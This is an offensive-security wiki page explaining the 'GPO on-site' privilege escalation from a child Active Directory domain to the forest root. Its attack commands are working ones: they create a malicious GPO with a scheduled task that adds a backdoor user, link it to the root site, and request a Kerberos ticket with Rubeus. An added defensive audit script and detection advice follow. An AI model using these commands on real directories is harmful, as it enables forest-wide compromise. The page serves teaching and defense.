# GPO On-Site Attack

This technique can be used to escalate from a child domain to its parent domain: a GPO created in the child domain is linked to an Active Directory site, and because site objects live in the forest-wide Configuration partition, the policy also applies to the parent's domain controllers in that site. The steps are the following:

1. Create a malicious GPO on the child DC.
2. Query the root domain to identify the replication site of the root DC.
3. Link the created GPO to the `Default Replication` site of the root DC as `SYSTEM`.
4. Once replication has completed, confirm that the created GPO is present on the root DC.

We'll start by creating a GPO.

```powershell
$gpo = "Something"
New-GPO $gpo
```

With that set up, we'll create an immediate scheduled task inside that GPO that adds a new user.

{% code overflow="wrap" %}

```powershell
Import-Module .\PowerView_2.ps1
New-GPOImmediateTask -Verbose -Force -TaskName 'Something' -GPODisplayName "Something" -Command C:\Windows\System32\cmd.exe -CommandArguments "/c net user otter SomethingSecure123! /add"
```

{% endcode %}

We can verify in the Group Policy Management Console that the task has been added; while there, we also have to make sure the `Run a new instance in parallel` option is set.


<figure><img src="https://i.imgur.com/jbIMHr3.png" alt=""><figcaption></figcaption></figure>

<figure><img src="https://i.imgur.com/KeNAEUB.png" alt=""><figcaption></figcaption></figure>

After this, it's time to link the GPO to the `Default Replication` site of the root DC. To do this we first have to retrieve the site's distinguished name from the root DC's server object:

```powershell
Get-ADDomainController -Server domain.com | Select ServerObjectDN
```

and then link the GPO to it from a `SYSTEM` shell:

```powershell
$sitePath = "CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=DOMAIN,DC=COM"
New-GPLink -Name "Something" -Target $sitePath -Server dev.domain.com
```

Now we can wait for the task to run and request a TGT for the backdoored user on the parent DC.

{% hint style="info" %}
The target might need to be reset after the scheduled task has run.
{% endhint %}

{% code overflow="wrap" %}

```powershell
.\Rubeus.exe asktgt /user:otter /password:'SomethingSecure123!' /domain:domain.com /ptt
```

{% endcode %}
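Defensive counterpart, added here and not part of the original page: a PowerShell audit that enumerates every site object in the Configuration partition carrying a `gPLink`, flags links whose GPO is hosted outside the forest root domain (the shape of the link created above), and checks the linked GPO's SYSVOL folder for a Group Policy Preferences immediate scheduled task. It assumes the RSAT `ActiveDirectory` and `GroupPolicy` modules on a domain-joined host; the `Get-SiteLinkedGpoAudit` function name is my own.

```powershell
# Added defensive audit, not from the original page. Enumerates site-linked GPOs
# and flags the pattern described above: a GPO from a non-root domain linked to a
# site object, optionally carrying a GPP "immediate" scheduled task in SYSVOL.
Import-Module ActiveDirectory
Import-Module GroupPolicy

function Get-SiteLinkedGpoAudit {
    $forest   = Get-ADForest
    $rootDN   = (Get-ADDomain -Identity $forest.RootDomain).DistinguishedName
    $configDN = (Get-ADRootDSE -Server $forest.RootDomain).configurationNamingContext

    # Site objects live in the Configuration partition, which replicates forest-wide,
    # so a link placed here from any domain reaches every DC in that site.
    $sites = Get-ADObject -Server $forest.RootDomain -SearchBase "CN=Sites,$configDN" `
        -LDAPFilter '(&(objectClass=site)(gPLink=*))' -Properties gPLink

    foreach ($site in $sites) {
        # gPLink format: [LDAP://cn={GUID},cn=policies,cn=system,DC=x,DC=y;<options>]...
        foreach ($m in [regex]::Matches($site.gPLink, '\[LDAP://(?<dn>[^;]+);(?<opt>\d+)\]')) {
            $gpoDN       = $m.Groups['dn'].Value
            $gpoGuid     = [regex]::Match($gpoDN, '\{[0-9A-Fa-f-]+\}').Value
            $gpoDomainDN = $gpoDN.Substring($gpoDN.IndexOf('DC=', [StringComparison]::OrdinalIgnoreCase))
            $gpoDomain   = (($gpoDomainDN -split ',') -replace '^DC=', '') -join '.'

            # GPP immediate tasks are written under Machine\Preferences\ScheduledTasks.
            $taskXml = "\\$gpoDomain\SYSVOL\$gpoDomain\Policies\$gpoGuid\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml"
            $hasImmediate = (Test-Path $taskXml) -and
                            [bool](Select-String -Path $taskXml -Pattern 'ImmediateTask' -Quiet)

            $gpoName = '<unresolved>'
            try { $gpoName = (Get-GPO -Guid $gpoGuid -Domain $gpoDomain -ErrorAction Stop).DisplayName } catch {}

            $crossDomain = ($gpoDomainDN -ne $rootDN)   # GPO hosted outside the forest root domain
            [pscustomobject]@{
                Site            = $site.Name
                GpoName         = $gpoName
                GpoDomain       = $gpoDomain
                LinkOptions     = [int]$m.Groups['opt'].Value   # 1 = link disabled, 2 = enforced
                CrossDomainLink = $crossDomain
                ImmediateTask   = $hasImmediate
                Suspicious      = $crossDomain -and $hasImmediate
            }
        }
    }
}

Get-SiteLinkedGpoAudit | Sort-Object Suspicious, CrossDomainLink -Descending | Format-Table -AutoSize
```

For ongoing detection rather than a point-in-time audit, enable Directory Service Changes auditing on the site objects so that a modification of `gPLink` is logged as event ID 5136 on the DC that takes the write.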
